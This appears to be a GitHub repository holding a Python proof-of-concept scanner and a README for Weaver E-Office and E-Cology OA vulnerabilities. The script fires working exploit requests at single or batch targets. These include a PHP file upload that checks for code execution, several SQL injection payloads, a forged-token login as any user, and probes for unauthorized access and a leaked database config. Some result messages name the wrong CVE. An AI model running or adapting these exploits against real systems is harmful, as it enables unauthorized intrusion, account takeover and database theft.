├── 2023-Weaver-pocs.py └── README.md /2023-Weaver-pocs.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import re 4 | import base64 5 | 6 | 7 | requests.packages.urllib3.disable_warnings() 8 | 9 | 10 | def pocs(url): 11 | baseurl = url.strip() # 去除行尾换行符 12 | print("\n") 13 | flag = f"测试url:{baseurl}" 14 | print(f"\033[1;33m{flag}\033[0m") 15 | print("\n") 16 | CVE_2023_2523(baseurl) 17 | CVE_2023_2648(baseurl) 18 | CVE_2023_15672(baseurl) 19 | CNVD_2023_12632(baseurl) 20 | e_cology_apiSQLinj(baseurl) 21 | e_cology_ofsLogin_anyusers_login(baseurl) 22 | QVD_2023_9849(baseurl) 23 | UserSelect_unauthorized(baseurl) 24 | mysql_config_db_infoleak(baseurl) 25 | 26 | 27 | 28 | def CVE_2023_2523(baseurl): 29 | flag = "正在检测泛微 E-Office文件上传漏洞(CVE-2023-2523)" 30 | print(f"\033[0;34m{flag}\033[0m") 31 | testurl = baseurl + 'E-mobile/App/Ajax/ajax.php?action=mobile_upload_save' 32 | # 设置请求头 33 | headers = { 34 | 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt', 35 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36', 36 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' 37 | } 38 | 39 | # 设置表单数据,base64编码 40 | data = 'LS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5ZFJWQ0dXcTRDeDNTcTZ0dApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InVwbG9hZF9xdXdhbiI7IGZpbGVuYW1lPSJ0ZXN0LnBocC4iCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZwoKPD9waHAgcHJpbnQoMjU2KiAyNTYpOyB1bmxpbmsoX19GSUxFX18pOz8+Ci0tLS0tLVdlYktpdEZvcm1Cb3VuZGFyeWRSVkNHV3E0Q3gzU3E2dHQKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJmaWxlIjsgZmlsZW5hbWU9IiIKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0KIAogCi0tLS0tLVdlYktpdEZvcm1Cb3VuZGFyeWRSVkNHV3E0Q3gzU3E2dHQtLQ==' 41 | 42 | try: 43 | response = requests.post(testurl, headers=headers, data=base64.b64decode(data), timeout=5) 44 | if response.status_code == 200 and "test.php" in response.text: 45 | matches = re.findall(r"(\d{10})", response.text) 46 | url = baseurl + "attachment/" + matches[1] + "/test.php" 47 | resp = requests.get(url) 48 | if resp.status_code == 200 and "65536" in resp.text: 49 | result = f"[+]存在泛微 E-Office文件上传漏洞(CVE-2023-2523)!建议手动复验确认!url:{baseurl}" 50 | print(f"\033[1;31m{result}\033[0m") 51 | else: 52 | result = "[-]不存在泛微 E-Office文件上传漏洞(CVE-2023-2523)" 53 | print(f"\033[0;32m{result}\033[0m") 54 | else: 55 | result = "[-]不存在泛微 E-Office文件上传漏洞(CVE-2023-2523)" 56 | print(f"\033[0;32m{result}\033[0m") 57 | except Exception as e: 58 | print(e) 59 | print("测试失败,响应超时") 60 | 61 | def CVE_2023_2648(baseurl): 62 | flag = "正在检测泛微 E-Office文件上传漏洞(CVE-2023-2648)" 63 | print(f"\033[0;34m{flag}\033[0m") 64 | testurl = baseurl + 'inc/jquery/uploadify/uploadify.php' 65 | # 设置请求头 66 | headers = { 67 | 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt', 68 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36', 69 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' 70 | } 71 | 72 | # 设置表单数据,base64编码 73 | data = 'LS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5ZFJWQ0dXcTRDeDNTcTZ0dApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9IkZkaWxlZGF0YSI7IGZpbGVuYW1lPSI0NDQucGhwLiIKQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnCiAKPD9waHAgcHJpbnQoMjU2KiAyNTYpOyB1bmxpbmsoX19GSUxFX18pOz8+Ci0tLS0tLVdlYktpdEZvcm1Cb3VuZGFyeWRSVkNHV3E0Q3gzU3E2dHQ=' 74 | 75 | try: 76 | response = requests.post(testurl, headers=headers, data=base64.b64decode(data), timeout=5) 77 | if response.status_code == 200: 78 | matches = re.findall(r"(\d{10})", response.text) 79 | url = baseurl + "attachment/" + matches[0] + "/444.php" 80 | resp = requests.get(url) 81 | if resp.status_code == 200 and "65536" in resp.text: 82 | result = f"[+]存在泛微 E-Office文件上传漏洞(CVE-2023-2523)!建议手动复验确认!url:{baseurl}" 83 | print(f"\033[1;31m{result}\033[0m") 84 | else: 85 | result = "[-]不存在泛微 E-Office文件上传漏洞(CVE-2023-2523)" 86 | print(f"\033[0;32m{result}\033[0m") 87 | else: 88 | result = "[-]不存在泛微 E-Office文件上传漏洞(CVE-2023-2523)" 89 | print(f"\033[0;32m{result}\033[0m") 90 | except Exception as e: 91 | print(e) 92 | print("测试失败,响应超时") 93 | 94 | def CVE_2023_15672(baseurl): 95 | flag = "正在检测泛微E-Cology SQL注入漏洞(CVE-2023-15672)" 96 | print(f"\033[0;34m{flag}\033[0m") 97 | testurl = baseurl + 'weaver/weaver.file.FileDownloadForOutDoc/?fileid=123+WAITFOR+DELAY+\'0:0:5\'&isFromOutImg=1' 98 | # 设置请求头 99 | headers = { 100 | 'Accept': '*/*', 101 | 'Accept-Encoding': 'gzip, deflate', 102 | 'Accept-Language': 'zh-CN,zh;q=0.9', 103 | 'Connection': 'close' 104 | } 105 | try: 106 | response = requests.post(testurl, headers=headers, timeout=5) 107 | if response.status_code == 200: 108 | result = f"[+]存在泛微E-Cology SQL注入漏洞(CVE-2023-15672)!建议手动复验确认!url:{baseurl}" 109 | print(f"\033[1;31m{result}\033[0m") 110 | else: 111 | result = "[-]不存在泛微E-Cology SQL注入漏洞(CVE-2023-15672)" 112 | print(f"\033[0;32m{result}\033[0m") 113 | except Exception as e: 114 | print(e) 115 | print("测试失败,响应超时") 116 | 117 | 118 | def CNVD_2023_12632(baseurl): 119 | flag = "正在检测泛微OA E-Cology9未授权SQL注入漏洞(CNVD-2023-12632)" 120 | print(f"\033[0;34m{flag}\033[0m") 121 | testurl = baseurl + 'mobile/plugin/browser.jsp' 122 | headers = {'Upgrade-Insecure-Requests': '1', 123 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36', 124 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 125 | 'Accept-Encoding': 'gzip, deflate', 126 | 'Accept-Language': 'zh-CN,zh;q=0.9', 127 | 'x-forwarded-for': '127.0.0.1', 128 | 'x-originating-ip': '127.0.0.1', 129 | 'x-remote-ip': '127.0.0.1', 130 | 'x-remote-addr': '127.0.0.1', 131 | 'Content-Type': 'application/x-www-form-urlencoded'} 132 | data = "isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537" 133 | try: 134 | response = requests.post(testurl, verify=False, timeout=5, headers=headers, data=data) 135 | if 'Microsoft SQL Server' in response.text: 136 | result = f"[+]存在泛微OA E-Cology9未授权SQL注入漏洞(CNVD-2023-12632)!建议手动复验确认!url:{baseurl}" 137 | print(f"\033[1;31m{result}\033[0m") 138 | else: 139 | result = "[-]不存在泛微OA E-Cology9未授权SQL注入漏洞(CNVD-2023-12632)" 140 | print(f"\033[0;32m{result}\033[0m") 141 | except Exception as e: 142 | print(e) 143 | print("测试失败,响应超时") 144 | 145 | def e_cology_apiSQLinj(baseurl): 146 | flag = "正在检测泛微OA e-cology前台接口SQL注入漏洞" 147 | print(f"\033[0;34m{flag}\033[0m") 148 | testurl = baseurl + 'mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333' 149 | headers = { 150 | 'Content-Type': 'application/x-www-form-urlencoded', 151 | 'Connection': 'close', 152 | 'Upgrade-Insecure-Requests': '1', 153 | } 154 | data = "formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1" 155 | try: 156 | response = requests.post(testurl, headers=headers, data=data, timeout=5) 157 | if response.status_code == 200 and "id" in response.text: 158 | result = f"[+]存在泛微OA e-cology前台接口SQL注入漏洞!建议手动复验确认!url:{baseurl}" 159 | print(f"\033[1;31m{result}\033[0m") 160 | else: 161 | result = "[-]不存在泛微OA e-cology前台接口SQL注入漏洞" 162 | print(f"\033[0;32m{result}\033[0m") 163 | except Exception as e: 164 | print(e) 165 | print("测试失败,响应超时") 166 | 167 | def e_cology_ofsLogin_anyusers_login(baseurl): 168 | flag = "正在检测泛微 e-cology ofsLogin任意用户登录漏洞" 169 | print(f"\033[0;34m{flag}\033[0m") 170 | testurl = baseurl + 'mobile/plugin/1/ofsLogin.jsp?gopage=/wui/index.html&loginTokenFromThird=866fb3887a60239fc112354ee7ffc168&receiver=1&syscode=1×tamp' 171 | try: 172 | response = requests.get(testurl, timeout=5) 173 | if response.status_code == 200: 174 | result = f"[+]存在泛微 e-cology ofsLogin任意用户登录漏洞!建议手动复验确认!url:{baseurl}" 175 | print(f"\033[1;31m{result}\033[0m") 176 | else: 177 | result = "[-]不存在泛微 e-cology ofsLogin任意用户登录漏洞" 178 | print(f"\033[0;32m{result}\033[0m") 179 | except Exception as e: 180 | print(e) 181 | print("测试失败,响应超时") 182 | 183 | def QVD_2023_9849(baseurl): 184 | flag = "正在检测泛微E-Cology /CheckServer.jsp路径SQL注入漏洞(QVD-2023-9849)" 185 | print(f"\033[0;34m{flag}\033[0m") 186 | testurl = baseurl + 'mobile/plugin/CheckServer.jsp?type=mobileSetting' 187 | headers = { 188 | "Connection": "close" 189 | } 190 | try: 191 | response = requests.get(testurl, headers=headers, timeout=5) 192 | if response.status_code == 200 and "system error" in response.text: 193 | result = f"[+]存在泛微E-Cology /CheckServer.jsp路径SQL注入漏洞(QVD-2023-9849)!建议手动复验确认!url:{baseurl}" 194 | print(f"\033[1;31m{result}\033[0m") 195 | else: 196 | result = "[-]不存在泛微E-Cology /CheckServer.jsp路径SQL注入漏洞(QVD-2023-9849)" 197 | print(f"\033[0;32m{result}\033[0m") 198 | except Exception as e: 199 | print(e) 200 | print("测试失败,响应超时") 201 | 202 | def UserSelect_unauthorized(baseurl): 203 | flag = "正在检测泛微E-Office UserSelect未授权访问漏洞" 204 | print(f"\033[0;34m{flag}\033[0m") 205 | testurl = baseurl + 'UserSelect/' 206 | headers = { 207 | "Content-Type": "application/json" 208 | } 209 | try: 210 | response = requests.get(testurl, headers=headers, timeout=5) 211 | if response.status_code == 200: 212 | result = f"[+]存在泛微E-Office UserSelect未授权访问漏洞!建议手动复验确认!url:{baseurl}" 213 | print(f"\033[1;31m{result}\033[0m") 214 | else: 215 | result = "[-]不存在泛微E-Office UserSelect未授权访问漏洞" 216 | print(f"\033[0;32m{result}\033[0m") 217 | except Exception as e: 218 | print(e) 219 | print("测试失败,响应超时") 220 | 221 | def mysql_config_db_infoleak(baseurl): 222 | flag = "正在检测泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞" 223 | print(f"\033[0;34m{flag}\033[0m") 224 | testurl = baseurl + 'mysql_config.ini' 225 | headers = { 226 | "Content-Type": "application/json" 227 | } 228 | try: 229 | response = requests.get(testurl, headers=headers, timeout=5) 230 | if response.status_code == 200 and "dataurl" in response.text: 231 | result = f"[+]存在泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞!建议手动复验确认!url:{baseurl}" 232 | print(f"\033[1;31m{result}\033[0m") 233 | else: 234 | result = "[-]不存在泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞" 235 | print(f"\033[0;32m{result}\033[0m") 236 | except Exception as e: 237 | print(e) 238 | print("测试失败,响应超时") 239 | 240 | 241 | def geturl_from_file(filename): 242 | with open(filename, "r") as f: 243 | url_list = f.readlines() 244 | return url_list 245 | 246 | if __name__ == '__main__': 247 | logo = "author: kuang-zy\nGitHub: https://github.com/kuang-zy" 248 | print(f"\033[1;36m{logo}\033[0m") 249 | print("\n") 250 | try: 251 | if sys.argv[1] == '-u': 252 | url = sys.argv[2] 253 | pocs(url) 254 | elif sys.argv[1] == "-f": 255 | filename = sys.argv[2] 256 | urls = geturl_from_file(filename) 257 | for url in urls: 258 | pocs(url) 259 | elif sys.argv[1] == "-h": 260 | print("-h\t\t输出本帮助菜单") 261 | print("-u url\t\t单个url进行poc检测,例:-u https://www.baidu.com/ (注意:最后的\"/\"一定要加上)") 262 | print("-f filename\t批量检测,一行放一个url保存到txt中,例:-f targets.txt") 263 | else: 264 | print("输入\"-h\"查看使用帮助") 265 | except Exception as e: 266 | print("输入\"-h\"查看使用帮助") 267 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 2023-Weaver-pocs 2 | ## 2023泛微0A漏洞poc检测工具 3 | 4 | ### 支持检测漏洞 5 | 泛微 E-Office文件上传漏洞(CVE-2023-2523) 6 | 泛微 E-Office文件上传漏洞(CVE-2023-2648) 7 | 泛微E-Cology SQL注入漏洞(CVE-2023-15672) 8 | 泛微OA E-Cology9未授权SQL注入漏洞(CNVD-2023-12632) 9 | 泛微OA e-cology前台接口SQL注入漏洞 10 | 泛微 e-cology ofsLogin任意用户登录漏洞 11 | 泛微E-Cology /CheckServer.jsp 路径SQL注入漏洞(QVD-2023-9849) 12 | 泛微E-Office UserSelect未授权访问漏洞 13 | 泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞 14 | 15 | ### 环境 16 | **Python3环境,依赖库** 17 | import requests 18 | import sys 19 | import re 20 | import base64 21 | 22 | ### 使用 23 | -h 输出本帮助菜单 24 | -u url 单个url进行poc检测,例:-u https://www.baidu.com/ (注意:最后的"/"一定要加上) 25 | -f filename 批量检测,一行放一个url保存到txt中,例:-f targets.txt 26 | ![84b519d98cf27fdb2f1cd5e3888b55f](https://github.com/kuang-zy/2023-Weaver-pocs/assets/53716757/62579ca0-8dcf-4f9e-ad05-46dd65865977) 27 | 28 | --------------------------------------------------------------------------------